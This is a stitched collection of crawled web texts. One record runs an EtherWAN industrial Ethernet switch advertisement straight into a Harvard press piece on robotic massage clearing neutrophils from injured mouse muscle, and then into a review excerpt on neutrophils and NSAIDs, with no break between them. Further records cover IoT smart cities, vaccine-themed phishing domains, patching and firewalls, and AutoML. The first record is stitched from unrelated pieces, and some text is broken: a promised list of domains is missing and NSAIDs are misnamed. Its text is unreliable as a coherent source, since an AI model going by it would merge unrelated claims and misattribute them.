The industrial control environment is harsh compared to computer rooms and offices. Networking equipment and systems must be able to withstand high levels of electrical noise, dust, dirt, and humidity, as well as extreme hot and cold temperatures. To run the plant twenty-four hours a day, 365 days a year, factory-floor controllers must access data embedded in drive systems, operator workstations, and I/O devices in real time. For example, terminating the fill operation on a bottle requires far more time-sensitive communications than accessing the next page of an Internet site.
Automation control applications require accuracy of data transmission rather than bandwidth for large packets; any packet loss can disrupt the operation flow or lead to unacceptable results. EtherWAN's α-Ring topology provides network redundancy to guarantee network availability and reliability: if a connection fails, the network can recover in less than 15 ms, and the same efficiency holds even when more than 130 switches are connected. The solution is to install the EX94005 (5-port unmanaged switch) in the robotic machine. Each control or assembly station may have multiple EX94005 unmanaged switches in line, all connecting to the EX73000 (16-port hardened managed switch) to form a redundant Ethernet ring. The EX77000 (24-port hardened managed switch), located in the centralized control room of the industrial zone, is also connected to the EX73000 switches in the field. This allows administrators to monitor the production flow and take appropriate action when demand calls for it.
EtherWAN's products are designed for hardened, heavy-duty applications suitable for the extreme environments found in industrial automation. EtherWAN's Ethernet switches carry UL1604/ISA 12.12.01 safety certifications for hazardous environments, and the proprietary α-Ring technology ensures that the data communication needs of real-time applications are met, along with the ability to monitor them to support more flexible production demands. As a result of using EtherWAN's switches, the overall downtime rate is decreased, helping users attain maximum availability and minimum day-to-day maintenance.
But other than making people feel good, do these “mechanotherapies” actually improve healing after severe injury?
According to a new study from researchers at Harvard’s Wyss Institute for Biologically Inspired Engineering and John A. Paulson School of Engineering and Applied Sciences (SEAS), the answer is “yes.”
Using a custom-designed robotic system to deliver consistent and tunable compressive forces to mice’s leg muscles, the team found that this mechanical loading (ML) rapidly clears immune cells called neutrophils out of severely injured muscle tissue.
This process also removed inflammatory cytokines released by neutrophils from the muscles, enhancing the process of muscle fiber regeneration. The research is published in Science Translational Medicine.
“Lots of people have been trying to study the beneficial effects of massage and other mechanotherapies on the body, but up to this point it hadn’t been done in a systematic, reproducible way. Our work shows a very clear connection between mechanical stimulation and immune function.
This has promise for regenerating a wide variety of tissues including bone, tendon, hair, and skin, and can also be used in patients with diseases that prevent the use of drug-based interventions,” said first author Bo Ri Seo, Ph.D., who is a Postdoctoral Fellow in the lab of Core Faculty member Dave Mooney, Ph.D. at the Wyss Institute and SEAS.
A more meticulous massage gun
Seo and her coauthors started exploring the effects of mechanotherapy on injured tissues in mice several years ago, and found that it doubled the rate of muscle regeneration and reduced tissue scarring over the course of two weeks. Excited by the idea that mechanical stimulation alone can foster regeneration and enhance muscle function, the team decided to probe more deeply into exactly how that process worked in the body, and to figure out what parameters would maximize healing.
They teamed up with soft robotics experts in the Harvard Biodesign Lab, led by Wyss Associate Faculty member Conor Walsh, Ph.D., to create a small device that used sensors and actuators to monitor and control the force applied to the limb of a mouse.
"The device we created allows us to precisely control parameters like the amount and frequency of force applied, enabling a much more systematic approach to understanding tissue healing than would be possible with a manual approach," said co-second author Christopher Payne, Ph.D., a former Postdoctoral Fellow at the Wyss Institute and the Harvard Biodesign Lab who is now a Robotics Engineer at Viam, Inc.
Once the device was ready, the team experimented with applying force to mice’s leg muscles via a soft silicone tip and used ultrasound to get a look at what happened to the tissue in response. They observed that the muscles experienced a strain of between 10-40%, confirming that the tissues were experiencing mechanical force.
They also used those ultrasound imaging data to develop and validate a computational model that could predict the amount of tissue strain under different loading forces.
They then applied consistent, repeated force to injured muscles for 14 days. While both treated and untreated muscles displayed a reduction in the amount of damaged muscle fibers, the reduction was more pronounced and the cross-sectional area of the fibers was larger in the treated muscle, indicating that treatment had led to greater repair and strength recovery.
The greater the force applied during treatment, the stronger the injured muscles became, confirming that mechanotherapy improves muscle recovery after injury. But how?
Evicting neutrophils to enhance regeneration
To answer that question, the scientists performed a detailed biological assessment, analyzing a wide range of inflammation-related factors called cytokines and chemokines in untreated vs. treated muscles. A subset of cytokines was dramatically lower in treated muscles after three days of mechanotherapy, and these cytokines are associated with the movement of immune cells called neutrophils, which play many roles in the inflammation process.
Treated muscles also had fewer neutrophils in their tissue than untreated muscles, suggesting that the reduction in cytokines that attract them had caused the decrease in neutrophil infiltration.
The team had a hunch that the force applied to the muscle by the mechanotherapy effectively squeezed the neutrophils and cytokines out of the injured tissue. They confirmed this theory by injecting fluorescent molecules into the muscles and observing that the movement of the molecules was more significant with force application, supporting the idea that it helped to flush out the muscle tissue.
To pick apart what effect the neutrophils and their associated cytokines have on regenerating muscle fibers, the scientists performed in vitro studies in which they grew muscle progenitor cells (MPCs) in a medium in which neutrophils had previously been grown.
They found that the number of MPCs increased, but the rate at which they differentiated (developed into other cell types) decreased, suggesting that neutrophil-secreted factors stimulate the growth of muscle cells, but the prolonged presence of those factors impairs the production of new muscle fibers.
“Neutrophils are known to kill and clear out pathogens and damaged tissue, but in this study we identified their direct impacts on muscle progenitor cell behaviors,” said co-second author Stephanie McNamara, a former Post-Graduate Fellow at the Wyss Institute who is now an M.D.-Ph.D. student at Harvard Medical School (HMS).
“While the inflammatory response is important for regeneration in the initial stages of healing, it is equally important that inflammation is quickly resolved to enable the regenerative processes to run its full course.”
Seo and her colleagues then turned back to their in vivo model and analyzed the types of muscle fibers in the treated vs. untreated mice 14 days after injury. They found that type IIX fibers were prevalent in healthy muscle and treated muscle, but untreated injured muscle contained smaller numbers of type IIX fibers and increased numbers of type IIA fibers. This difference explained the enlarged fiber size and greater force production of treated muscles, as IIX fibers produce more force than IIA fibers.
Finally, the team homed in on the optimal amount of time for neutrophil presence in injured muscle by depleting neutrophils in the mice on the third day after injury. The treated mice’s muscles showed larger fiber size and greater strength recovery than those in untreated mice, confirming that while neutrophils are necessary in the earliest stages of injury recovery, getting them out of the injury site early leads to improved muscle regeneration.
“These findings are remarkable because they indicate that we can influence the function of the body’s immune system in a drug-free, non-invasive way,” said Walsh, who is also the Paul A. Maeder Professor of Engineering and Applied Science at SEAS and whose group is experienced in developing wearable technology for diagnosing and treating disease. “This provides great motivation for the development of external, mechanical interventions to help accelerate and improve muscle and tissue healing that have the potential to be rapidly translated to the clinic.”
The team is continuing to investigate this line of research with multiple projects in the lab. They plan to validate this mechanotherapeutic approach in larger animals, with the goal of being able to test its efficacy on humans. They also hope to test it on different types of injuries, age-related muscle loss, and muscle performance enhancement.
“The fields of mechanotherapy and immunotherapy rarely interact with each other, but this work is a testament to how crucial it is to consider both physical and biological elements when studying and working to improve human health,” said Mooney, who is the corresponding author of the paper and the Robert P. Pinkas Family Professor of Bioengineering at SEAS.
“The idea that mechanics influence cell and tissue function was ridiculed until the last few decades, and while scientists have made great strides in establishing acceptance of this fact, we still know very little about how that process actually works at the organ level.
This research has revealed a previously unknown type of interplay between mechanobiology and immunology that is critical for muscle tissue healing, in addition to describing a new form of mechanotherapy that potentially could be as potent as chemical or gene therapies, but much simpler and less invasive," said Wyss Founding Director Don Ingber, M.D., Ph.D., who is also the Judah Folkman Professor of Vascular Biology at HMS and the Vascular Biology Program at Boston Children's Hospital, as well as Professor of Bioengineering at SEAS.
ACUTE RESPONSE OF NEUTROPHILS TO EXERCISE
If inflammation is regarded as the proliferation of WBCs after soft tissue injury, then the cellular inflammatory response actually begins at the onset of exercise, when the circulating level of neutrophils increases significantly. 5–8 Neutrophils are the first WBC population to arrive and affect the host inflammatory response during exercise and soft tissue injury ( Table).
These cells have both specific and nonspecific defensive mechanisms, some of which are capable of causing additional tissue damage. 15–18 In the past, the early effects of damaging eccentric exercise were proposed to result in increased numbers of circulating neutrophils, as these cells would be required to enter the injury site to initiate phagocytosis or removal of damaged tissues.
However, this immediate response has also been observed after both noninjurious passive stretching and isometric exercise, illustrating that the presence of neutrophils does not necessarily always lead to injury. 19
The mechanism for early neutrophilia postexercise is likely due to a combination of factors. During rest, more than half of the circulating neutrophils are marginated along the endothelial walls of blood vessels. At the onset of exercise, increases in epinephrine, blood flow, and cell-signaling molecules demarginate these neutrophils away from the vessel walls, resulting in their mobilization into the circulation. 5, 20, 21 Demargination allows the neutrophils to enter the circulation and redistribute elsewhere in the body, as needed. The mechanisms by which neutrophils localize in damaged or stressed tissue are just beginning to be understood and may represent key strategies for intervention to limit certain aspects of inflammation.
The movement of a neutrophil from the circulation into the tissue, called diapedesis, is under tight regulatory control of the underlying tissue. In skeletal muscle, diapedesis can occur rapidly during exercise. 22 Neutrophil recruitment is ultimately the responsibility of the muscle fibers (myocytes) together with mast cells from a variety of tissues, including the local connective tissue. If a myocyte is perturbed in some fashion, such as in the case of an active stretch or contusion, it communicates with the endothelial wall of the adjacent blood vessel, initiating a cascade of signaling events and resulting in diapedesis. This intercellular communication is accomplished, in part, by a series of cell-signaling molecules, or cytokines, that are essential to any understanding of immune cell function.
The term cytokine is derived from the Greek root meaning “to put cells into motion.” 17 All nucleated cells in the body produce cytokines and similarly express cytokine receptors on their surface membranes. Cytokines act at the surface of the target cells, principally to alter cell function. 23
Skeletal muscle continually produces cytokines in an effort to maintain homeostasis and to regulate function. Simple perturbations of skeletal muscle, such as an active stretch during eccentric exercise, markedly increase the expression of interleukin-1β (IL-1β) and tumor necrosis factor–α (TNF-α). 24
These proinflammatory cytokines upregulate the expression of endothelial-leukocyte adhesion molecules (E-selectin) within the endothelium of the adjacent blood vessels. 17, 25, 26 Activation of the endothelium is site specific and can result in the release of additional IL-1β, as well as additional proinflammatory cytokines, including IL-6 and IL-8, both of which have been shown to attract neutrophils. 27–31
Thus, endothelial activation serves 2 purposes: encouraging the adhesion of neutrophils at the site of cell stress (margination) and assisting the cell in recruiting additional neutrophils ( Figure 1).
The temporary adhesion of neutrophils to the endothelium results in their immobilization and, hence, prolonged signaling from the muscle cell. 32 Without margination, no effective communication would be possible between the myocytes and the neutrophils, because these cell types would not be in close proximity for an adequate length of time.
This cytokine-mediated communication results in a reorganization of neutrophil 33, 34 and endothelial 35, 36 cell structure, allowing the neutrophils to pass from the endothelium (diapedesis) to the extracellular matrix (ECM) adjacent to the myocytes.
The traditional thinking has been that these cytokines were released only by injured or damaged myocytes, resulting in the localization of neutrophils to these injured tissues. This finding has been observed after eccentric contractions 4, 37 and has led to speculation that inflammation is the process responsible for delayed-onset muscle soreness. 19, 20, 38
However, simple muscle activation and passive stretch have recently been shown to be sufficient stimuli for diapedesis to occur, with subsequent localization of neutrophils within the ECM of skeletal muscle. 39, 40 Currently, researchers are focused on the mechanisms for neutrophil recruitment and the function of these neutrophils in otherwise healthy, uninjured muscle.
Among the most important questions regarding neutrophils and inflammation is whether the localization of neutrophils in the ECM facilitates healing or tissue destruction. Evidence is beginning to indicate that it is more likely a combination of both repair and further damage. The latter seems somewhat surprising but may even be an important signal for tissue repair.
Historically, the acute management of athletic musculoskeletal injury has focused on limiting the cardinal signs of inflammation in an effort to expedite the rehabilitative process and to facilitate an early return to competition. 81 To this end, the use of ice, compression, and elevation for initial management of injuries has flourished.
Over the last 25 years, rationales for acute treatment practices have changed, focusing on retarding secondary injury in an effort to minimize total injury. 82, 83 Regardless of the rationale, the practice of using ice, compression, and elevation in managing acute inflammation is well ingrained. Although a potential role for the use of physical agents, such as cryotherapy, in attenuating the neutrophilic response has been demonstrated in the laboratory, 84, 85 the actual clinical evidence supporting the efficacy of these practices is limited.
Similarly, limiting inflammation and enhancing tissue repair through the suppression of neutrophil recruitment and activation may reduce tissue damage postexercise. Such efforts have been established, as nonsteroidal inflammatory drugs (NSAIDs) have been used for centuries in an attempt to limit the inflammatory response. However, the anti-inflammatory effects may be confounded by the analgesic action of these drugs, 86 which has long been the focus of early interventions for muscle injury. 81
It has been suggested that the magnitude of pain after tissue trauma corresponds to the concentration of WBCs within the injured tissue. 87 However, this theory has not been supported in the literature. For example, although tendinitis is a common diagnosis, the absence of WBCs in tissues affected by this condition indicates that this is not a true inflammatory response. 88
Conversely, the mere presence of WBCs does not always coincide with the cardinal signs of inflammation. White blood cells have been observed in the absence of obvious tissue trauma, 39 even though this situation is generally not referred to as an inflammatory process.
A challenge to reducing inflammation through pharmacologic intervention is the multiple cellular pathways by which the inflammatory response can be mediated. Traditional NSAIDs block the cyclooxygenase (COX) pathway that contributes to cell-mediated prostaglandin (PGE 2) production 89 and, arguably, neutrophil recruitment. 90 However, other proinflammatory pathways exist for the cell to recruit neutrophils to damaged or exercised muscle, including the alternative lipoxygenase pathway 91 and the nuclear factor kappa-B (NF-κB)–mediated induction of proinflammatory genes. 92
Although a great deal of information on the efficacy of NSAID use exists in the literature, the immediate and long-term use of NSAIDs to control inflammation remains controversial. This may be due to the multiple proinflammatory pathways, the wide variety of emerging NSAIDs designed to target specific cellular pathways, and their respective effects of muscle repair and regeneration.
The effects of NSAIDs on inflammatory cell accumulation in the muscle and their relationship with muscle repair remain controversial. 44 For instance, inhibition of NF-κB by curcumin has been shown to accelerate muscle regeneration. 93 Although non–NF-κB inhibitors such as the NSAID naproxen have been shown to have no effect on muscle cell regeneration, 94 NS-398 (a COX-2–specific inhibitor) reduced neutrophil and macrophage entry into the muscle, delayed regeneration and healing, and resulted in increased TGF-β1 and increased tissue fibrosis. 89
Evidence is accumulating that NSAIDs may actually interfere with satellite cell proliferation, differentiation, and fusion 89, 95 and, therefore, may adversely affect muscle regeneration and repair. 89, 96, 97 Similarly, inhibited tissue repair after NSAID administration has also been shown after injury in other soft tissues, including ligaments. 98 Ultimately, although NSAID treatment for soft tissue injuries is common in sports medicine settings, no concrete evidence demonstrates that such treatments are justified, even for the analgesic effects. 99
If it is beneficial to limit the neutrophilic response, then the timing and dosage of NSAIDs are likely important. Neutrophils are the dominant immune cells for the first 4 to 24 hours postinjury, after which macrophages predominate. 3 Some potential clearly exists for limiting the neutrophil-mediated damage that appears to accompany mechanical stress to muscle and other tissues.
However, whether more is to be gained by combating the secondary neutrophilic damage but potentially interfering with the muscle regeneration process or by accepting the secondary damage in hopes that faster regeneration is stimulated remains unclear. It is important to note that evidence of impaired regeneration 75 was observed in neutrophil-depleted mice. That is, regeneration was impaired in an animal model in which no neutrophils were present, indicating that neutrophils may play a key role in muscle repair.
Although this laboratory model is useful, it does not reflect the clinical reality of acute intervention in the injured athlete. Completely abolishing the neutrophilic response using typical clinical cryotherapy or NSAID therapy would be practically impossible. Therefore, we expect that some level of neutrophilic response would be seen, regardless of our acute intervention. No data presently describe whether a partially muted response would be beneficial or harmful.
In skeletal muscle, the propensity for an enhanced inflammatory response and fibroblast proliferation exceeds the muscle’s ability to regenerate, particularly in humans, resulting in the formation of a fibrotic scar. Until recently, this fibrotic response was presumed to be a necessary step in the formation of nascent myotubes for muscle fiber repair.
However, fibrotic scar formation is not an optimal outcome and may be due to excessive cell signaling 100 and inflammatory response. 101 When the function of fibroblasts and TGF-β1 was inhibited after laceration injuries, skeletal muscle had the inherent ability to regenerate damaged fibers. 102–104 Although this finding has not been studied in models of severe strain injury, the manipulation of cell signaling may provide a glimpse into the possible future of therapeutic agents designed to modify tissue healing.
Clinically, return to activity can result in an exacerbation of the inflammatory response. 105 However, evidence is also accumulating that regular exercise acts as an anti-inflammatory agent. 106 Neutrophil function and cytotoxicity may be modified through exercise, 107 and these modifications may depend on exercise intensity. 21 The production of cytokines by neutrophils as well as the resulting response from all WBCs can be modified with long-term exercise. 15
The exact mechanisms are not known, but the low-level inflammatory response produced through regular exercise may blunt the cells’ response to cytokines or inhibit their production and subsequent release. In this regard, regular exercise may suppress the release of proinflammatory cytokines, such as TNF-α. 106 Recently, using isolated chondrocytes, the proinflammatory response was shown to vary depending on the magnitude of the mechanical signal applied to the tissue. 108 Thus, exercise may produce both proinflammatory and anti-inflammatory effects, depending on the magnitude of the stimulus and the corresponding level of cytokine released.
More information: Skeletal muscle regeneration with robotic actuation–mediated clearance of neutrophils, Science Translational Medicine (2021). www.science.org/doi/10.1126/scitranslmed.abe8868 | <urn:uuid:4fd09676-0542-4d40-9c03-9dd24bfd3175> | CC-MAIN-2022-40 | https://debuglies.com/2021/10/08/massage-quickly-removes-neutrophils-from-severely-injured-muscle-tissue-and-makes-them-heal-faster-and-stronger/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00602.warc.gz | en | 0.949954 | 4,418 | 2.796875 | 3 |
Whether you are a tech enthusiast or a casual tech fan, one thing is certain: you have heard about the Internet of Things on at least one occasion. If anything, it would be more surprising if you had not noticed that the Internet of Things is now making waves.
In simple terms, the idea behind the Internet of things is connecting any device that can be turned on and off to the Internet or a certain network. This means that related gadgets, devices, and appliances can be connected and programmed in such a way that will improve efficiency. For the individual, this could mean a better-kept household, a more efficient way of doing chores, and better communication among members of the same household. For cities, the Internet of things spells accessibility and efficiency, giving way to the rise of smart cities.
How the Internet of Things Can Help in Creating Smarter Cities
To put it simply, a smart city is a city wherein information and communication technologies are incorporated into various aspects of life, particularly public services, to improve the city's functions and the quality of life of the people in it. The ultimate goal in creating smart cities is increasing efficiency and livability to maximize resources and minimize waste and operating costs.
There are various ways in which the Internet of things can be used to create smarter cities. Since the Internet of things can be used in programming and remotely control any device connected to the internet or a network, the possibilities are virtually limitless. The Internet of things can be used to improve various aspects of city life, ranging from enhanced public services to accelerated emergency response.
The internet of things can be used to enhance public services in various ways. For example, it can be used to create parking availability apps which can aid in alleviating traffic problems, especially in busy areas. It can also create push notifications for city-wide announcements, detect water leaks, and even determine health or transport eligibility.
Effective public transport management is also one good application of the internet of things. The usual pitfall of transportation systems is the lack of coordination between different modes of public transportation. The internet of things attempts to solve this problem by providing means by which different modes of public transportation may compensate for delays and shortcomings of one another. This presents commuters with several travel alternatives. In addition, the internet of things can also be used in the predictive maintenance of transport systems, thereby further reducing the likelihood of mishaps and delays.
Finally, the internet of things is also useful in terms of accelerated emergency response. Through real-time data collection, information across various devices can be analyzed instantly, allowing quicker responses to emergencies. This is especially helpful in the case of medical emergencies wherein doctors at the destination hospital could give instructions and receive patient data to allow for quicker treatment upon the patient’s arrival at the destination hospital.
Of course, using the Internet of Things to create smarter cities also comes with its own disadvantages, although these are typically related to logistics and resources. To effectively convert a city into a smart city, the internet network throughout the city must be well established, and the city's infrastructure must undergo changes and modifications to accommodate internet connectivity and other network programming functions.
Despite the upfront costs associated with creating smarter cities, the final result is certainly well worth the investment. After all, not only do smart cities provide a safer, more efficient, and more livable community for residents, but they also help in addressing environmental concerns.
Smarter Cities for Healthier Environment
In addition to being highly efficient, smart cities are also environmentally friendly. In the same way that sensors can be used to operate streetlights and manage transportation systems, the Internet of Things can also be used to create more environmentally friendly cities. Here are some of the ways it can make cities smarter for the environment:
It lays the groundwork for fewer emissions.
One of the greatest advantages of employing the internet of things in creating smarter cities is that it greatly improves transportation. With several public modes of transportation available and more efficient ride-sharing options, individuals are less incentivized to drive their own cars, thereby lowering emissions. In addition, a more efficient transport system also lessens the number of vehicles on the streets, making major thoroughfares more bike-friendly.
It is more energy- and resource-efficient.
Employing the internet of things in creating smarter cities means automating routine processes. This significantly lowers processing time and allows for optimizing processes to conserve energy. Connecting related services to one network allows for proper scheduling of maintenance, check-ups, and operation times, thereby allowing operators to determine when certain services or devices can be turned off without affecting the delivery of public services.
In addition, sensors play an important part in making smart cities' energy use more efficient. By using automated doors in major establishments, for example, indoor climate can be better maintained, preventing centralized cooling systems from overworking and consuming too much energy. Using sensors to ensure that resources are only turned on when needed is another advantage of the Internet of Things: touchless faucets in public bathrooms, for example, allow the city to save on water consumption, as does detecting leaks in water pipes that would otherwise go unnoticed. Sensors are especially useful in the case of streetlights, since instead of being kept on continuously, streetlights can remain off until movement is detected in the immediate vicinity.
It allows for real-time monitoring of living conditions.
Finally, sensors and cameras installed in smart cities allow for regular monitoring of environmental conditions, including pollution levels, air quality, noise levels, temperature, and even traffic. By collecting such data, the city council can easily identify areas that need more attention and enact policies that help address environmental problems early on. Regular monitoring of living conditions also allows the city council to see how efficient environment-related processes, such as garbage collection and waste disposal, really are.
The internet of things has certainly changed how we do things. On a larger scale, as in the case of cities, using the internet of things to optimize processes can help improve efficiency and take care of the environment. By allowing for regular monitoring of living conditions and real-time data analysis, the internet of things can give the city council the information they need to nip environmental problems in the bud and come up with solutions that can be implemented effectively even with limited resources. Thus, the internet of things is essential in making smart cities more efficient and helping alleviate environmental problems that inevitably arise in metropolitan areas. | <urn:uuid:5be15491-db5e-47f8-86da-75dd0b05c853> | CC-MAIN-2022-40 | https://equivio.com/creating-smarter-cities-with-internet-of-things/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334591.19/warc/CC-MAIN-20220925162915-20220925192915-00002.warc.gz | en | 0.92871 | 1,313 | 3.40625 | 3 |
The topic of COVID-19 vaccines has drawn much attention, including in the cybersecurity sector. Spikes in domain registration activity, detected recently, hint at a probable increase in phishing attacks.
When various countries started their vaccination campaigns in 2020, purchases of domains with the word “vaccine” sharply peaked.
The trend was first noticed back in August 2020, when the Typosquatting Data Feed saw dozens of Sputnik-related domain names shortly after Russia’s announcement about the new Sputnik vaccine.
Similarly, the number of domains featuring the word “vaccine” increased by almost 100% in the month after the first Pfizer COVID-19 vaccine was administered to a patient.
Webroot, an American cybersecurity software company, observed that from December 8 through January 6, 94.8% more domain names with “vaccine” in them were registered compared with the previous month.
Within the last year, over 12,000 domains related to the COVID-19 vaccine were registered. Many are bought for legitimate reasons, but many others need to be treated with caution.
Other terms used in the domain names included vaccination, vaccinate, covid, coronavirus, freezer, clinic, trial, tracker, and certificate. Sixty-four percent of those domains were registered under the .com top-level domain. This may be an indication that the bad actors want to target mostly commercial domains.
In fact, some of the vaccine-related domains have already been reported on VirusTotal for suspicious activities like phishing. For example, this group of domains was bulk-registered in August 2020:
So what does all this tell us?
Due to increased interest in coronavirus-related topics, people visit such websites more often for information, services, and so on. Vaccine-related domains should therefore be visited with extra care, as they may present phishing and other threats.
Did you know that the most common way cybercriminals get into a network is through loopholes in popular software, applications, and programs?
Despite how advanced modern software is, it is still designed by humans, and the fact is that humans make mistakes. Due to this, much of the software you rely on to get work done every day could have flaws — or “exploits” — that leave you vulnerable to security breaches.
Many of the most common malware and viruses used by cybercriminals today are based on exploiting those programming flaws; to address this, developers regularly release software patches and updates to fix those flaws and protect the users.
This is why it's imperative that you keep your applications and systems up to date – everything from your firewalls to your antivirus software.
Why? Check out this video to learn more about patching, firewalls, and antivirus software:
Unfortunately, most users find updates to be tedious and time-consuming and often opt to just click “Remind Me Later” instead of sitting through an often-inconvenient update process.
If your systems are not patched, that’s like leaving all of your sensitive documents in an unlocked car accessible to anyone willing to check if the door is open.
You can install patches manually, via a regularly scheduled task. Or you can set up your systems to automatically install patches whenever the manufacturer releases them.
Another tool for protecting your network is the use of anti-virus software, which continuously scans your systems looking for malicious programs such as a virus or worm.
You also need to make sure you have a viable firewall in place. A firewall is a set of rules that block or allow connections to your environment. Firewalls shield your computer or network from malicious or unnecessary network traffic.
By regularly patching your software, using anti-virus software, and using a firewall, you now have multiple layers of protection. This doesn’t mean your computers will be safe from every type of threat, but it is a solid starting point in enhancing your cybersecurity. | <urn:uuid:1acf8607-95e2-42c4-8798-df1e1b0b7dd1> | CC-MAIN-2022-40 | https://www.kraftgrp.com/patching-firewalls-anti-virus-software/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334974.57/warc/CC-MAIN-20220927002241-20220927032241-00002.warc.gz | en | 0.940488 | 436 | 3.125 | 3 |
What is AutoML?
Automated Machine Learning (AutoML) has become a trending topic in industry and academic artificial intelligence (AI) research in recent years. AutoML shows great promise in providing solutions for AI in regulated industries in providing explainable and reproducible results. AutoML allows for greater access to AI development for those without the theoretical background currently needed for role in data science.
Every step in the current prototypical data science pipeline, such as data preprocessing, feature engineering, and hyperparameter optimization, has to be done manually by machine learning experts. By comparison, adopting AutoML allows a simpler development process by which a few lines of code can generate the code necessary to begin developing a machine learning model.
One can think of AutoML - regardless of whether building classifiers or training regressions - as a generalized search concept, with specialized search algorithms for finding the optimal solutions for each component piece of the ML pipeline. In building a system that allows for the automation of just three key pieces of automation – feature engineering, hyperparameter optimization, and neural architecture search – AutoML promises a future where democratized machine learning is a reality.
Types of AutoML
In a data science pipeline, there are many steps a data science team must go through to build a predictive model. Even experienced teams of data scientists and ML engineers can benefit from the increased speed and transparency that comes with AutoML. A data scientist has to start with a hypothesis, gather the correct dataset, try some data visualization, engineer extra features to harness all signal available, train a model with hyperparameters, and for state-of-the-art deep learning they have to design the optimal architecture for a Deep Neural Network - hopefully on a GPU if available to them.
Automated Feature Engineering
A data feature is a part of the input data to a machine learning model, and feature engineering refers to the transformative process where a data scientist derives new information from existing data. Feature engineering is one of the key value-adding processes in an ML workflow, and good features are the difference between a model with acceptable performance and a brilliantly performant model. These mathematical transformations of raw data are read into the model, and serve as the heart of the machine learning process. Automated feature engineering (AFE) is the process of exploring the space of viable combinations of features in a mechanistic – rather than manual – fashion.
Manual feature engineering is a modern-day alchemy that comes at a great cost in terms of time: building a single feature can often take hours, and the number of features required for a bare minimum accuracy score, let alone a production-level accuracy baseline, can number into the hundreds. By automating the exploration of a feature space, AutoML reduces the time a data science team spends in this phase from days to minutes.
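As a toy illustration of the idea (not how any particular commercial AFE system works), the sketch below mechanically generates pairwise product and ratio features from the numeric columns of a pandas DataFrame and keeps only those most correlated with the target; the column names and the choice of transforms are arbitrary examples:

import numpy as np
import pandas as pd

def generate_candidate_features(df, numeric_cols):
    # Mechanically derive interaction and ratio features from every pair of numeric columns.
    candidates = pd.DataFrame(index=df.index)
    for i, a in enumerate(numeric_cols):
        for b in numeric_cols[i + 1:]:
            candidates[f"{a}_x_{b}"] = df[a] * df[b]
            candidates[f"{a}_div_{b}"] = df[a] / df[b].replace(0, np.nan)
    return candidates

def select_top_features(candidates, target, k=10):
    # Rank candidate features by absolute correlation with the target and keep the top k.
    scores = candidates.corrwith(target).abs().sort_values(ascending=False)
    return scores.head(k).index.tolist()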
Reducing the hours of manual intervention by a data scientist is not the only benefit for automated feature engineering. Generated features are often clearly interpretable. In strictly regulated industries such as healthcare or finance, that explainability is important because it lowers barriers to adopting AI via interpretability. Additionally, a data scientist or analyst benefits from the clarity of these features because they make the high-quality models more compelling and actionable. Automatically generated features also have the potential to find new KPIs for an organization to monitor and act upon. Once a data scientist has completed feature engineering, they then have to optimize their models with strategic feature selection.
Automated Hyperparameter Optimization
Hyperparameters are a part of machine learning algorithms best understood by analogy as levers for fine-tuning model performance – though often incremental adjustments have outsize impact. In small scale data science modeling, hyperparameters can easily be set by hand and optimized by trial and error.
For deep learning applications, the number of hyperparameters grows exponentially which puts their optimization beyond the abilities of a data science team to accomplish in a manual and timely fashion. Automated hyperparameter optimization (HPO) relieves teams of the intensive responsibility to explore and optimize across the full event space for hyperparameters and instead allows teams to iterate and experiment over features and models.
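The snippet below is a small, hedged illustration of the concept using scikit-learn's RandomizedSearchCV rather than any IBM product; the model choice, the parameter ranges, and the assumed X_train and y_train variables are placeholders:

from scipy.stats import randint
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import RandomizedSearchCV

param_distributions = {
    "n_estimators": randint(50, 500),
    "max_depth": randint(2, 20),
    "min_samples_leaf": randint(1, 10),
}

search = RandomizedSearchCV(
    RandomForestClassifier(random_state=0),
    param_distributions=param_distributions,
    n_iter=25,        # number of sampled hyperparameter configurations
    cv=5,             # 5-fold cross-validation for each configuration
    scoring="f1",     # optimize the metric that matters to the business problem
    random_state=0,
)
# search.fit(X_train, y_train)
# print(search.best_params_, search.best_score_)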
Another strength of automating the machine learning process is that now data scientists can focus on the why of model creation rather than the how. Considering the extremely large amounts of data available to many enterprises and the overwhelming number of questions that can be answered with this data, an analytics team can pay attention to which aspects of the model they should optimize for, such as the classic problem of minimizing false negatives in medical testing.
Neural Architecture Search (NAS)
The most complex and time-consuming process in deep learning is the creation of the neural architecture. Data science teams spend long amounts of time selecting the appropriate layers and learning rates that in the end are often only for the weights in the model, as in many language models. Neural architecture search (NAS) has been described as “using neural nets to design neural nets” and is one of the most obvious areas of ML to benefit from automation.
NAS searches begin with a choice of which architectures to try. The outcome of NAS is determined by the metric against which each architecture is judged. There are several common algorithms to use in a neural architecture search. If the potential number of architectures is small, choices for testing can be made at random. Gradient-based approaches, whereby the discrete search space is turned into a continuous representation, have shown to be very effective. Data science teams can also try evolutionary algorithms in which architectures are evaluated at random, and changes are applied slowly, propagating child architectures that are more successful while pruning those that are not.
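To make the random-search strategy concrete, here is a toy sketch; the search space and the train_and_score helper are hypothetical stand-ins, and real NAS systems explore far larger spaces with smarter search algorithms:

import random

search_space = {
    "num_layers": [2, 3, 4, 5],
    "units_per_layer": [32, 64, 128, 256],
    "activation": ["relu", "tanh"],
    "learning_rate": [1e-2, 1e-3, 1e-4],
}

def sample_architecture(space):
    # Pick one option at random for every architectural choice.
    return {name: random.choice(options) for name, options in space.items()}

def random_nas(n_trials, train_and_score):
    # train_and_score(arch) is assumed to train a candidate network and return a validation score.
    best_arch, best_score = None, float("-inf")
    for _ in range(n_trials):
        arch = sample_architecture(search_space)
        score = train_and_score(arch)
        if score > best_score:
            best_arch, best_score = arch, score
    return best_arch, best_score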
Neural architecture searches are one of the key elements of AutoML that promise to democratize AI. These searches, however, often come with a very high carbon footprint. The tradeoffs have not yet been fully examined, and optimizing for ecological cost is an ongoing research area in NAS approaches.
Strategies to Use AutoML
Automated Machine Learning sounds like a panacea of technical solutionism that an organization can use to replace expensive data scientists, but in reality using it requires intelligent strategies for an organization. Data scientists fill essential roles to design experiments, translate results into business outcomes, and maintain the full lifecycle of their machine learning models. So how can cross-functional teams make use of AutoML to optimize their use of time and shorten time to realizing value from their models?
The optimal workflow for including AutoML APIs is one that uses it to parallelize workloads and shorten time spent on manually intensive tasks. Instead of spending days on hyperparameter tuning, a data scientist could instead automate this process on multiple types of models concurrently, and then subsequently test which was most performant.
